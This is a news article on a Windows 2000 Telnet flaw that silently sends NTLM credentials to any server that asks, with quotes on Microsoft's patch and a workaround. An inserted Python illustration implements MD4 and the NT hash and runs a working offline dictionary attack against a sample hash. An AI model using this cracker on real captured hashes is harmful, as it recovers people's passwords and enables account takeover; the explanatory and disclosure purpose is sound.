The problem involves the Windows 2000 Telnet client, a program that connects a PC to a network server so that commands can be run on that remote machine.
The security hole stems from Microsoft's convenient single sign-on feature, which saves people the hassle of logging in for each Telnet session: when a server asks for it, the client automatically authenticates with the logged-on user's Windows credentials, sending the user ID and a value derived from the user's password hash (NTLM authentication) without asking the user first.
Security experts warned that once an attacker captures that hash-derived value, a password cracker can recover the actual password offline, by hashing candidate passwords until one matches, without any further contact with the victim.
Although Telnet is not a frequently used program, a password thief could steal passwords by embedding a link in a Web page or an email that launches the victim's Telnet client; the client connects to the attacker's server and hands over the credentials automatically.
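What that warning amounts to in practice: the credential the client gives up is built on the NT hash, MD4 of the password encoded as UTF-16LE with no salt, so an attacker who captures it can test guesses offline at full speed. The following Python is an illustration added here, not code from the article or from Microsoft or @Stake: it implements MD4 and the NT hash and runs a dictionary attack against a constructed sample hash. The captured hash value and the wordlist are made up for the example. The Telnet client actually sends an NTLM challenge-response computed from this hash rather than the hash itself; cracking a captured response adds one DES step per guess (NTLMv1) but is otherwise the same loop.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, s):
    """Rotate a 32-bit word left by s bits."""
    return ((x << s) | (x >> (32 - s))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 digest (RFC 1320) in pure Python; implemented here because many
    OpenSSL builds no longer expose md4 through hashlib."""
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)                       # padding: 1 bit, then zeros
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)      # 64-bit little-endian length

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Round 1: words in order, shifts 3/7/11/19.
        for i in range(16):
            t = (a + f(b, c, d) + x[i]) & MASK32
            a, b, c, d = d, _rotl(t, (3, 7, 11, 19)[i % 4]), b, c
        # Round 2: words 0,4,8,12,1,5,..., shifts 3/5/9/13.
        for i in range(16):
            k = (i % 4) * 4 + i // 4
            t = (a + g(b, c, d) + x[k] + 0x5A827999) & MASK32
            a, b, c, d = d, _rotl(t, (3, 5, 9, 13)[i % 4]), b, c
        # Round 3: words 0,8,4,12,2,10,..., shifts 3/9/11/15.
        for i in range(16):
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            t = (a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32
            a, b, c, d = d, _rotl(t, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)

    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The NT hash: MD4 over the UTF-16LE password. No salt, no iteration,
    so identical passwords always give identical hashes."""
    return md4(password.encode("utf-16-le"))


def crack_nt_hash(target_hex: str, wordlist):
    """Offline dictionary attack: hash each candidate and compare it with the
    captured hash. Returns the recovered password, or None if no word matched."""
    target = bytes.fromhex(target_hex)
    for candidate in wordlist:
        if nt_hash(candidate) == target:
            return candidate
    return None


# Constructed sample input for the example (not taken from the article):
# an NT hash as an attacker might capture it, and a small wordlist.
CAPTURED_HASH = "8846f7eaee8fb117ad06bdd830b7586c"
WORDLIST = ["letmein", "123456", "qwerty", "Password1", "password", "welcome"]

if __name__ == "__main__":
    print("MD4(abc)  =", md4(b"abc").hex())
    print("recovered =", crack_nt_hash(CAPTURED_HASH, WORDLIST))
```

A real cracker differs only in scale: a GPU tries billions of NT hashes per second because the function is cheap and unsalted, which is why a captured hash or challenge-response is treated as a compromised password.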
"The risk is that the malicious user can create or craft a document and send it to another user, and that action would initiate a connection to the remote Telnet user," said Eric Schultze, security program manager for the Microsoft Security Response Center. "The patch we are issuing later today will prompt the user and say, 'We're about to send your password to that remote server, do you want to continue?'"
Microsoft was first notified about the problem Aug. 1 by Boston-based Internet security company @Stake. The companies have worked together to produce the software patch.
The security bulletin will be posted to the Microsoft.com security Web site and will be sent to members of the Microsoft security-notification mailing list later today.
According to security expert Elias Levy, the vulnerability mirrors a problem Microsoft faced more than two years ago, when the company's Web browser, Internet Explorer, provided people with the same single sign-on feature.
When a Web page referenced a resource on a remote server that demanded Windows authentication, IE would silently supply that server with the person's user identification and a value derived from the password hash.
To address this problem, Microsoft released a patch that let people choose, per Internet Explorer security zone in the control panel settings, whether this automatic logon is allowed.
"You could say, on my intranet, my company, I want Internet Explorer to automatically log me into servers, but on the Internet zone, I don't want it going out," said Levy, chief technology officer at the information security portal SecurityFocus.com. "Then it prompts you and asks you to input your username and password."
Levy said he knows of no instances where passwords have been stolen through the security vulnerability in Windows 2000 Telnet, but said he can think of ways they might be.
"If you're a criminal and you want to break into Company A and you have people's email addresses, you could send them email that would launch Telnet and try to get their passwords that way," he said.
Microsoft said that people concerned about their security can close the hole even before the patch is released by turning off the Telnet client's automatic (NTLM) authentication to remote computers, which is enabled by default; with it off, the client no longer sends the user's credentials unasked.